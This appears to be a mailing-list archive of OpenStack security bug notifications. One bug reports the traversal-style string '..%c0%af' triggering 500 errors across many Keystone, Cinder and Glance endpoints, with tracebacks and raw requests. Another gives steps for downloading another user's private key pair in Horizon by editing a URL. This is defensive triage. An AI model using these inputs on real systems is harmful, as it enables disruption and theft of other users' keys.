ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault resp = self.call_func(req, *args, **self.kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return self.func(req, *args, **kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/keystonemiddleware/auth_token/__init__.py", line 323, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault response = req.get_response(self._app) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault application, catch_exc_info=False) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault app_iter = application(self.environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 144, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return resp(environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 144, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return resp(environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/routes/middleware.py", line 141, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault response = self.app(environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 144, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return resp(environ, 
start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault resp = self.call_func(req, *args, **self.kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return self.func(req, *args, **kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/opt/stack/cinder/cinder/api/openstack/wsgi.py", line 817, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault "url": request.url}) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 504, in url 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault url = self.path_url 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 476, in path_url 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault bpath_info = bytes_(self.path_info, self.url_encoding) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return req.encget(key, encattr=encattr) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return val.decode(encoding) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return codecs.utf_8_decode(input, errors, True) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 3: invalid start byte 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault 2016-09-27 23:50:00.224 INFO eventlet.wsgi.server [req-7ec3610c-9cdc-4f7d-b69c-36c385d0fa10 admin] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py", line 481, in handle_one_response result = self.application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/paste/urlmap.py", line 216, in __call__ return app(environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 126, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File 
"/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 126, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/request_id.py", line 37, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/opt/stack/cinder/cinder/api/middleware/fault.py", line 81, in __call__ return self._error(ex, req) File "/opt/stack/cinder/cinder/api/middleware/fault.py", line 56, in _error msg_dict = dict(url=req.url, status=status) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 504, in url url = self.path_url File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 476, in path_url bpath_info = bytes_(self.path_info, self.url_encoding) File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget return req.encget(key, encattr=encattr) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget return val.decode(encoding) File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode return codecs.utf_8_decode(input, errors, True) UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 3: invalid start byte 2016-09-27 23:50:00.228 INFO eventlet.wsgi.server [req-7ec3610c-9cdc- 4f7d-b69c-36c385d0fa10 admin] 10.0.2.2 "POST /v2/..%c0%af/backups HTTP/1.1" status: 500 len: 139 time: 0.0827849 ===================================================== Example traceback from Glance ===================================================== 2016-09-28 00:11:55.844 32495 INFO eventlet.wsgi.server [-] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py", line 481, in handle_one_response result = self.application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 126, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = 
self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 123, in __call__ response = self.process_request(req) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 148, in __call__ return self.func(req, *args, **kw) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/healthcheck/__init__.py", line 361, in process_request if req.path != self._path: File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 485, in path bpath = bytes_(self.path_info, self.url_encoding) File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget return req.encget(key, encattr=encattr) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget return val.decode(encoding) File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode return codecs.utf_8_decode(input, errors, True) UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 13: invalid start byte 2016-09-28 00:11:55.854 32495 INFO eventlet.wsgi.server [-] 10.0.2.2 - - [28/Sep/2016 00:11:55] "GET /v2/images/..%c0%af/tags/..%c0%af HTTP/1.1" 500 139 0.043949 I'm not sure whether right approach here is to file a bug with webob (looks like there are several that haven't been resolved yet [1] [2]), or to fix this in each project's respective wsgi error-handling code. [1] https://github.com/Pylons/webob/issues/115 [2] https://github.com/Pylons/webob/issues/161 ** Bug watch added: github.com/Pylons/webob/issues #115 https://github.com/Pylons/webob/issues/115 ** Bug watch added: github.com/Pylons/webob/issues #161 https://github.com/Pylons/webob/issues/161 ** Summary changed: - String "..%c0%af" causes 500 errors in multiple locations in Keystone v3 + String "..%c0%af" causes 500 errors in multiple locations ** Also affects: neutron Importance: Undecided Status: New ** Also affects: glance Importance: Undecided Status: New ** Also affects: cinder Importance: Undecided Status: New -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1613901 Title: String "..%c0%af" causes 500 errors in multiple locations Status in Cinder: New Status in Glance: New Status in OpenStack Identity (keystone): Confirmed Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: While doing some testing on Keystone using Syntribos (https://github.com/openstack/syntribos), our team (myself, Michael Dong, Rahul U Nair, Vinay Potluri, Aastha Dixit, and Khanak Nangia) noticed that we got 500 status codes when the string "..%c0%af" was inserted in various places in the URL for different types of requests. 
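As a minimal illustration (an editorial sketch, not part of the original report; assumes a Python 2 interpreter, matching the tracebacks above): "%c0%af" percent-decodes to the byte pair 0xC0 0xAF, an overlong encoding of "/" that strict UTF-8 decoders reject, and that rejection is what surfaces as the UnicodeDecodeError in the WSGI layer.

    >>> import urllib
    >>> segment = urllib.unquote('..%c0%af')  # hypothetical path segment, as in the requests below
    >>> segment
    '..\xc0\xaf'
    >>> segment.decode('utf-8')
    Traceback (most recent call last):
      ...
    UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 2: invalid start byte

Any later access to req.url or req.path_info triggers the same decode inside webob (see the path_url/encget frames in the tracebacks above), so even the fault middleware's own error formatting fails.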
Here are some examples: ========= DELETE /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] Content-Length: 0 HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:04:27 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-238fd5a9-be45-41f2-893a-97b513b27af3 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= PATCH /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 Content-type: application/json X-Auth-Token: [REDACTED] Content-Length: 70 {"type": "--serialization-mime-type--", "blob": "--serialized-blob--"} HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:05:36 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-57a41600-02b4-4d2a-b3e9-40f7724d65f2 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= GET /v3/domains/0426ac1e48f642ef9544c2251e07e261/groups/..%c0%af/roles HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:07:09 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-02313f77-63c6-4aa8-a87e-e3d2a13ad6b7 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= I've marked this as a security issue as a precaution in case it turns out that there is a more serious vulnerability underlying these errors. We have no reason to suspect that there is a greater vulnerability at this time, but given the many endpoints this seems to affect, I figured caution was worthwhile since this may be a framework-wide issue. Feel free to make this public if it is determined not to be security-impacting. Here is a (possibly incomplete) list of affected endpoints. Inserting the string "..%c0%af" in any or all of the spots labeled "HERE" should yield a 500 error. As you can see, virtually all v3 endpoints exhibit this behavior. 
========= [GET|PATCH|DELETE] /v3/endpoints/[HERE] [GET|PATCH] /v3/domains/[HERE] GET /v3/domains/[HERE]/groups/[HERE]/roles [HEAD|PUT|DELETE] /v3/domains/[HERE]/groups/[HERE]/roles/[HERE] GET /v3/domains/[HERE]/users/[HERE]/roles [HEAD|DELETE] /v3/domains/[HERE]/users/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/groups/[HERE] [HEAD|PUT|DELETE] /v3/groups[HERE]/users/[HERE] [POST|DELETE] /v3/keys/[HERE] [GET|PATCH|DELETE] /v3/policies/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/endpoints/[HERE] [GET|HEAD] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/policy [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/regions/[HERE] [GET|PATCH|DELETE] /v3/projects/[HERE] [DELETE|PATCH] /v3/projects/[HERE]/cascade GET /v3/projects/[HERE]/groups/[HERE]/roles GET /v3/projects/[HERE]/users/[HERE]/roles [HEAD|PUT|DELETE] /v3/projects/[HERE]/groups/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/regions/[HERE] [PATCH|DELETE] /v3/roles/[HERE] [GET|PATCH|DELETE] /v3/services/[HERE] [GET|PATCH|DELETE] /v3/users/[HERE] GET /v3/users/[HERE]/groups POST /v3/users/[HERE]/password GET /v3/users/[HERE]/projects GET /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/OS-OAUTH1/consumers/[HERE] [GET|DELETE] /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE] To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1613901/+subscriptions From 1613901 at bugs.launchpad.net Wed Sep 28 01:05:23 2016 From: 1613901 at bugs.launchpad.net (Armando Migliaccio) Date: Wed, 28 Sep 2016 01:05:23 -0000 Subject: [Openstack-security] [Bug 1613901] Re: String "..%c0%af" causes 500 errors in multiple locations References: <20160816233137.14656.30722.malonedeb@soybean.canonical.com> Message-ID: <20160928010524.27240.10212.malone@chaenomeles.canonical.com> I am unclear to where the issue lies, but should this be fixed centrally rather than being delegated to the individual projects? ** Changed in: neutron Status: New => Incomplete -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1613901 Title: String "..%c0%af" causes 500 errors in multiple locations Status in Cinder: New Status in Glance: New Status in OpenStack Identity (keystone): Confirmed Status in neutron: Incomplete Status in OpenStack Security Advisory: Won't Fix Bug description: While doing some testing on Keystone using Syntribos (https://github.com/openstack/syntribos), our team (myself, Michael Dong, Rahul U Nair, Vinay Potluri, Aastha Dixit, and Khanak Nangia) noticed that we got 500 status codes when the string "..%c0%af" was inserted in various places in the URL for different types of requests. 
Here are some examples: ========= DELETE /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] Content-Length: 0 HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:04:27 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-238fd5a9-be45-41f2-893a-97b513b27af3 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= PATCH /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 Content-type: application/json X-Auth-Token: [REDACTED] Content-Length: 70 {"type": "--serialization-mime-type--", "blob": "--serialized-blob--"} HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:05:36 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-57a41600-02b4-4d2a-b3e9-40f7724d65f2 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= GET /v3/domains/0426ac1e48f642ef9544c2251e07e261/groups/..%c0%af/roles HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:07:09 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-02313f77-63c6-4aa8-a87e-e3d2a13ad6b7 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= I've marked this as a security issue as a precaution in case it turns out that there is a more serious vulnerability underlying these errors. We have no reason to suspect that there is a greater vulnerability at this time, but given the many endpoints this seems to affect, I figured caution was worthwhile since this may be a framework-wide issue. Feel free to make this public if it is determined not to be security-impacting. Here is a (possibly incomplete) list of affected endpoints. Inserting the string "..%c0%af" in any or all of the spots labeled "HERE" should yield a 500 error. As you can see, virtually all v3 endpoints exhibit this behavior. 
========= [GET|PATCH|DELETE] /v3/endpoints/[HERE] [GET|PATCH] /v3/domains/[HERE] GET /v3/domains/[HERE]/groups/[HERE]/roles [HEAD|PUT|DELETE] /v3/domains/[HERE]/groups/[HERE]/roles/[HERE] GET /v3/domains/[HERE]/users/[HERE]/roles [HEAD|DELETE] /v3/domains/[HERE]/users/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/groups/[HERE] [HEAD|PUT|DELETE] /v3/groups[HERE]/users/[HERE] [POST|DELETE] /v3/keys/[HERE] [GET|PATCH|DELETE] /v3/policies/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/endpoints/[HERE] [GET|HEAD] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/policy [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/regions/[HERE] [GET|PATCH|DELETE] /v3/projects/[HERE] [DELETE|PATCH] /v3/projects/[HERE]/cascade GET /v3/projects/[HERE]/groups/[HERE]/roles GET /v3/projects/[HERE]/users/[HERE]/roles [HEAD|PUT|DELETE] /v3/projects/[HERE]/groups/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/regions/[HERE] [PATCH|DELETE] /v3/roles/[HERE] [GET|PATCH|DELETE] /v3/services/[HERE] [GET|PATCH|DELETE] /v3/users/[HERE] GET /v3/users/[HERE]/groups POST /v3/users/[HERE]/password GET /v3/users/[HERE]/projects GET /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/OS-OAUTH1/consumers/[HERE] [GET|DELETE] /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE] To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1613901/+subscriptions From sean_mcginnis at dell.com Wed Sep 28 01:23:05 2016 From: sean_mcginnis at dell.com (Sean McGinnis) Date: Wed, 28 Sep 2016 01:23:05 -0000 Subject: [Openstack-security] [Bug 1613901] Re: String "..%c0%af" causes 500 errors in multiple locations References: <20160816233137.14656.30722.malonedeb@soybean.canonical.com> Message-ID: <20160928012305.23585.73308.malone@gac.canonical.com> This does seem like something that should be fixed centrally. Otherwise this will pop up repeatedly as projects come and go. ** Changed in: cinder Status: New => Incomplete -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1613901 Title: String "..%c0%af" causes 500 errors in multiple locations Status in Cinder: Incomplete Status in Glance: New Status in OpenStack Identity (keystone): Confirmed Status in neutron: Incomplete Status in OpenStack Security Advisory: Won't Fix Bug description: While doing some testing on Keystone using Syntribos (https://github.com/openstack/syntribos), our team (myself, Michael Dong, Rahul U Nair, Vinay Potluri, Aastha Dixit, and Khanak Nangia) noticed that we got 500 status codes when the string "..%c0%af" was inserted in various places in the URL for different types of requests. 
Here are some examples: ========= DELETE /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] Content-Length: 0 HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:04:27 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-238fd5a9-be45-41f2-893a-97b513b27af3 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= PATCH /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 Content-type: application/json X-Auth-Token: [REDACTED] Content-Length: 70 {"type": "--serialization-mime-type--", "blob": "--serialized-blob--"} HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:05:36 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-57a41600-02b4-4d2a-b3e9-40f7724d65f2 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= GET /v3/domains/0426ac1e48f642ef9544c2251e07e261/groups/..%c0%af/roles HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:07:09 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-02313f77-63c6-4aa8-a87e-e3d2a13ad6b7 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= I've marked this as a security issue as a precaution in case it turns out that there is a more serious vulnerability underlying these errors. We have no reason to suspect that there is a greater vulnerability at this time, but given the many endpoints this seems to affect, I figured caution was worthwhile since this may be a framework-wide issue. Feel free to make this public if it is determined not to be security-impacting. Here is a (possibly incomplete) list of affected endpoints. Inserting the string "..%c0%af" in any or all of the spots labeled "HERE" should yield a 500 error. As you can see, virtually all v3 endpoints exhibit this behavior. 
========= [GET|PATCH|DELETE] /v3/endpoints/[HERE] [GET|PATCH] /v3/domains/[HERE] GET /v3/domains/[HERE]/groups/[HERE]/roles [HEAD|PUT|DELETE] /v3/domains/[HERE]/groups/[HERE]/roles/[HERE] GET /v3/domains/[HERE]/users/[HERE]/roles [HEAD|DELETE] /v3/domains/[HERE]/users/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/groups/[HERE] [HEAD|PUT|DELETE] /v3/groups[HERE]/users/[HERE] [POST|DELETE] /v3/keys/[HERE] [GET|PATCH|DELETE] /v3/policies/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/endpoints/[HERE] [GET|HEAD] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/policy [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/regions/[HERE] [GET|PATCH|DELETE] /v3/projects/[HERE] [DELETE|PATCH] /v3/projects/[HERE]/cascade GET /v3/projects/[HERE]/groups/[HERE]/roles GET /v3/projects/[HERE]/users/[HERE]/roles [HEAD|PUT|DELETE] /v3/projects/[HERE]/groups/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/regions/[HERE] [PATCH|DELETE] /v3/roles/[HERE] [GET|PATCH|DELETE] /v3/services/[HERE] [GET|PATCH|DELETE] /v3/users/[HERE] GET /v3/users/[HERE]/groups POST /v3/users/[HERE]/password GET /v3/users/[HERE]/projects GET /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/OS-OAUTH1/consumers/[HERE] [GET|DELETE] /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE] To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1613901/+subscriptions From tdecacqu at redhat.com Wed Sep 28 02:10:39 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Wed, 28 Sep 2016 02:10:39 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928021039.18181.18494.malone@wampee.canonical.com> Removed the security tags since it's a class E (or at best class D) according to the VMT taxonomy: https://security.openstack.org/vmt- process.html#incident-report-taxonomy. ** Information type changed from Public Security to Public ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags removed: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. 
It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Wed Sep 28 13:39:17 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 13:39:17 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928133918.17463.55080.launchpad@wampee.canonical.com> ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: 